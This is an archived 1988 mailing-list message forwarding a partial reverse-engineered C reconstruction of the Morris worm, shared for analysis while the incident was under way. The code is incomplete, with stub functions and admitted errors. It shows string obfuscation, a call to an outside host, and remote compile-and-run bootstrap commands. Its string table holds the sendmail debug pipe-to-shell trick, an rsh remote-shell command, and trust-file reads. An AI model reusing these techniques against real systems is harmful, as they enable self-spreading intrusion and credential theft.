The 'Security Digest' Archives (TM)

Archive: About | Browse | Search | Contributions | Feedback
Site: Help | Index | Search | Contact | Notices | Changes

ARCHIVE: 'Phage List' - Archives (1988 - 1989)
DOCUMENT: phage #182 [[becker@trantor.harris-atd.com: C code for part of worm]] (1 message, 3941 bytes)
SOURCE: http://securitydigest.org/exec/display?f=phage/archive/182.txt&t=text/plain
NOTICE: securitydigest.org recognises the rights of all third-party works.

START OF DOCUMENT

From: Jean Marie Diaz <jdiaz%oracle%hplabs@hplabs.HP.COM>
To: phage
Date: Fri 17:11:57 04/11/1988 EST
Subject: [becker@trantor.harris-atd.com: C code for part of worm]
References: [Thread Prev: 180] [Thread Next: 187] [Message Prev: 076] [Message Next: 043]



------- Forwarded Message

Received: by ATHENA-PO-2.MIT.EDU (5.45/4.7) id AA07174; Fri, 4 Nov 88 12:15:37 EST
Received: by ATHENA.MIT.EDU (5.45/4.7) id AA14060; Fri, 4 Nov 88 12:15:58 EST
Received: by trantor.harris-atd.com (5.51/1.14)
	id AA09158; Fri, 4 Nov 88 12:12:30 EST
Message-Id: <8811041712.AA09158@trantor.harris-atd.com>
Received: by disk.harris-atd.com (3.2/4.8) id AA01617; Fri, 4 Nov 88 12:11:58 EST
Date: Fri, 4 Nov 88 12:11:58 EST
From: Don Becker <becker@trantor.harris-atd.com>
To: sipb@athena.mit.edu
Subject: C code for part of worm


(I'm an old sipb member that was almost hit by the worm.  I thought
you might be interested

Send mail for the up-to-minute version.  I should be finished by this
evening.)



/*****************************************************************************\
*									      *
*	File:     worm.c						      *
*	Author:   Don Becker						      *
*	Created:  Thu Nov  3 17:16:10 1988				      *
*	Contents: Reverse engineered worm program that invaded ATD on 11/3/88 *
*									      *
******************************************************************************/

#include <stdio.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <signal.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int nobjects = 0;
int pleasequit;
int nextw, nifs;
char *null_auth;

/* These are the strings that are 'xor'ed with 0x81 in the binary. */

char environ[50] = "";
char *sh = "sh";
char *env52 = "sh";			/* 0x20034, <environ+52> */
char *env55 = "-p";
char *env58 = "l1.c";
char *env63 = "sh";
char *env66 = "/tmp/.dump";
char *env77 = "128.32.137.13";
char *env91 = "127.0.0.1";
char *env102 = "/usr/ucb/netstat -r -n";	/* 0x20066 */
char *env125 = "r";
char *env127 = "%s%s";

char *XS();

struct ifses {
    int l0, l4, l8, l12, l16, l20, l24;
    short l28;
} ifs[30];					/* Arbitrary */

main(argc, argv)		/* 0x20a0 */
     int argc;
     char **argv;
{
    int i, l1, pid_arg, j, cur_arg, l5;
    long key;			/* -28(fp) */
    struct rlimit rl;
   
    l1 = 0;
   
    strcpy(argv[0], XS(&env52)); /* "sh" */
    time(&key);
    srandom(key);
    rl.rlim_cur = 0;
    rl.rlim_max = 0;
    if (setrlimit(RLIMIT_CORE, &rl))
	;
    signal(SIGPIPE, SIG_IGN);
    pid_arg = 0;
    cur_arg = 1;
    if  (argc > 2 &&
	 strcmp(argv[cur_arg], XS(&env55)) == 0) { /* env55 == "-p" */
	pid_arg = atoi(argv[2]);
	cur_arg += 2;
    }
    for(i = cur_arg; i < argc; i++) {	/* otherwise <main+286> */
	if (loadobject(argv[i]) == 0)
	    exit(1);
	if (pid_arg)
	    unlink(argv[i]);
    }
    if ((nobjects < 1) || (getobjectbyname(XS(&env58)) == 0)) /* "l1.c" */
	exit(1);
    if (pid_arg) {
	for(i = 0; i < 32; i++)
	    close(i);
	unlink(argv[0]);
	unlink(XS(&env63));			/* "sh" */
	unlink(XS(&env66));			/* "/tmp/.dumb" */
    }
   
    for (i = 1; i < argc; i++)
	for (j = 0;	argv[i][j]; j++)
	    argv[i][j] = '\0';
    if (if_init() == 0)
	exit(1);
    if (pid_arg) {					/* main+600 */
	if (pid_arg == getpgrp(getpid()))
	    setpgrp(getpid(), getpid());
	kill(pid_arg, 9);
    }
    mainplus610();
}						/* main+610 */

static mainplus610()
{
    long key, time1, time0;
   
    time(&key);
    srandom(key);
    time0 = key;
    if (hg() == 0 && hl() == 0)
	ha();
    checkother();
    XS_152();
    cracksome();
    other_sleep(30);
    while (1) {
	cracksome();
	if (fork() > 0)
	    exit(0);
	if (hg() == 0 && hi() == 0 && ha() == 0)
	    hl();
	other_sleep(120);
	time(&time1);
	if (time1 - time0 >= 60*60*12)
	    h_clean();
	if (pleasequit && nextw > 0)
	    exit(0);
    }
}

static trans_cnt;
static char trans_buf[NCARGS];

char *XS(str1)			/* 0x23fc */
     char *str1;
{
    int i, len;
    char *newstr;
   
    len = strlen(str1);
    if (len + 1 > NCARGS - trans_cnt)
	trans_cnt = 0;
    newstr = &trans_buf[trans_cnt];
    trans_cnt += 1 + len;
    for (i = 0; str1[i]; i++)
	newstr[i] = str1[i]^0x81;
    newstr[i] = '\0';
    return newstr;
}

static XSplus152(arg1, arg2)				/* 0x2494 */
{
    int s;
    struct sockaddr soka;
    char msg;
   
    if (7 != random()/((short)15))		/* This needs fixed. It does not*/
	return;					/* produce the same div instn. */
    bzero(&soka, sizeof(soka));
    soka.sa_family = AF_INET;
    /* What is going on here??? */
    *((short *)soka.sa_data) = '],';		/* 0x2c5d */
    *((int *)(&soka.sa_data[2])) =
	inet_addr(XS(&env77));			/* "128.32.137.13" */
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0)
	return;
    if (sendto(s, &msg, 1, 0, &soka, sizeof(soka)))
	;
    close(s);
}

if_init()					/* 0x254c */
{
    int *l0, l1;
    char foo[396];
    int l408,l404,i;
    int s, l392;
    char foo1[60];
   
    nifs = 0;
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0)
	return 0;				/* if_init+1042 */
    l0 = &l392;
    l1 = 384;
    if (ioctl(s, 0xc0086914, &l1) < 0) {	/* 192.8.105.20 ??? */
	close(s);
	return 0;				/* if_init+1042 */
    }
    l404 = (l1< 0 ? l1+31 : l1) << 5;
    for(i = 0; i < l404; i++) {		/* if_init+144 */
	l408 = 0;
	if (l408 < nifs) {




	    ;
	}
    }
}

def_netmask(net_addr)				/* 0x2962 */
     int net_addr;
{
    if ((net_addr & 0x80000000) == 0)
	return 0xFF000000;
    if ((net_addr & 0xC0000000) == 0xC0000000)
	return 0xFFFF0000;
    return 0xFFFFFF00;
}

netmaskfor(addr)				/* 0x29aa */
     int addr;
{
    int i, mask;
   
    mask = def_netmask(addr);
    for (i = 0; i < nifs; i++)
	if ((addr & mask) == (ifs[i].l16 & mask))
	    return ifs[i].l24;
    return mask;
}

int ngateways;
rt_init()					/* 0x2a26 */
{
    FILE *pipe;
    char input_buf[64];
    int	 l204, l304;
   
    ngateways = 0;
    pipe = popen(XS(&env102), XS(&env125));	/*  "/usr/ucb/netstat -r -n", "r"*/
    if (pipe == 0)
	return 0;
    while (fgets(input_buf, sizeof(input_buf), pipe)) { /* to 518 */
	other_sleep(0);
	if (ngateways >= 500)
	    break;
	sscanf(input_buf, XS(&env127), l204, l304);	/* "%s%s" */
						/* other shit */


    }						/* 518, back to 76 */
    pclose(pipe);
    rt_init_plus_544();
    return 1;
}						/* 540 */

static rt_init_plus_544()				/* 0x2c44 */
{
}

getaddrs()					/* 0x2e1a */
{
}

a2in(a)						/* 0x2f4a */
{
    int in;
    static local;
    in = a;
    *(&local) = *(&in);
    return local;
}


x3a20(arg0, arg1, arg2)
{
    char *object;
    char local[40];
    char print_buf[512];			/* l568 */

    object = getobjectbyname(XS(&env201));	/* "l1.c" */
    if (object == NULL)
	return 0;				/* <hi+2128> */
    if (makemagic(arg0, l592, l580, l584, l588) == 0)
	return 0;
    waithit_plus1594(arg2, XS(&env206));	/* "PATH=/bin:/usr/bin:/usr/ucb\n" */
    waithit_plus1594(arg2, XS(&env235));	/* "cd /usr/tmp\n" */
    l576 = random() % 0x00FFFFFF;

    sprintf(print_buf, XS(&env248), l576);	/* "x%d.c" */
    sprintf(&l516, XS(&env254), print_buf);
    /* "echo gorch49;sed \'/int zz;/q\' > %s;echo gorch50\n" */
    waithit_plus1594(arg2, &l516);
   
    waithit_plus2412(arg1, XS(&env303), 10);	/* "gorch49" */

    xorbuf(object[8], object[4]);
    l572 = write(arg2, object[8], object[4]);
    xorbuf(object[8], object[4]);

    if (object[4] != l572) {
	close(l588);
	return 0;				/* to <hi+2128> */
    }
    waithit_plus1594(arg2, XS(&env311));	/* "int zz;\n\n" */
    waithit_plus2412(arg1, XS(&env321), 30);	/* "gorch50" */

    sprintf(&l516, XS(&env329), l576, l576, l576,
	inet_ntoa(a2in(l592, l580, l584, l576, l576)));
	/* "cc -o x%d x%d.c;./x%d %s %d %d;rm -f x%d x%d.c;echo DONE\n" */

    waithit_plus1594(arg2, &l516);

    if (waithit_plus2412(arg1, XS(&env387), 100) == 0) { /* "DONE" */
	close(l588);
	return 0;				/* <hi+2128> */
    }
    return waithit(arg0, l592, l580, l584, l588);
}

waithit_plus12xx()
{}						/* Does the 'cat' */

/* Installed as a signal handler */
justreturn(sig, code, scp)					/* 0x4872 */
     int sig, code;
     struct sigcontext *scp;
{ }
struct mag {
    short o0, o2;
    int l4, l8, l12, l16, l20, l24, o28, o32, o36, o40, o44;
    int o48[6];};

mail(arg0, arg1)				/* 4d3c <permute+162>*/
     struct mag arg1;
{
    int i, l8, l12, l16, s;
    struct sockaddr_in sin;
    char local[544];
    int l552, l556, l560, l564, l568;

    if (makemagic(arg1, &l556, &l560, &l564, &l568) == 0)
	return 0;				/* <permute+1054> */
    l552 = signal(SIGALRM, &justreturn);
    for( i = 0; i < 6; i++) {			/* to 430 */
	if (arg1.o48[i] == NULL)
	    continue;				/* to 422 */
	s = socket(AF_INET, SOCK_STREAM, 0);
	if (s < 0)
	    continue;				/* to 422 */

	bzero(&sin, sizeof(sin));		/* 16 */
	sin.sin_family = AF_INET;
	sin.sin_addr.s_addr = arg1.o48[i];
	sin.sin_port = IPPORT_SMTP;

	alarm(10);
	if (connect(s, &sin, sizeof(sin)) < 0) {
	    alarm(0);
	    close(s);
	    continue;				/* to 422 */
	}
	alarm(0);
	break;
    }
   
    if (i < 6)
	return 0;				/* 1054 */
    if (permute_plus1058( s, &l548) == 0)
	goto lp996;
   

}


char *text =
"default
0.0.0.0
127.0.0.1
exec /bin/sh
l1.c
PATH=/bin:/usr/bin:/usr/ucb
cd /usr/tmp
x%d.c
echo gorch49;sed '/int zz;/q' > %s;echo gorch50
gorch49
int zz;
gorch50
cc -o x%d x%d.c;./x%d %s %d %d;rm -f x%d x%d.c;echo DONE
DONE
x%d,%s
PATH=/bin:/usr/bin:/usr/ucb
rm -f sh
if [ -f sh ]
then
P=x%d
else
P=sh
cc -o $P %s
./$P -p $$
rm -f $P
rm -f %s $P
l1.c
cd /usr/tmp
x%d.c
cat > %s <<'EOF'
cc -o x%d x%d.c;x%d %s %d %d;rm -f x%d x%d.c
/usr/ucb/rsh
/usr/bin/rsh
/bin/rsh
/bin/echo %s
debug
mail from:</dev/null>
rcpt to:<"| sed '1,/^$/d' | /bin/sh ; exit 0">
data
quit
quit
exec /usr/ucb/rsh %s -l %s 'exec /bin/sh'
/bin/sh
/bin/sh
127.0.0.1
127.0.0.1
/etc/hosts.equiv
%.100s
/.rhosts
%.200s/.forward
%.20s%.20s
%[^ ,]
%*s %[^ ,]s
%.200s/.forward
%.200s/.rhosts
%s%s
/usr/dict/words";

------- End of Forwarded Message



------- End Forwarded Message

END OF DOCUMENT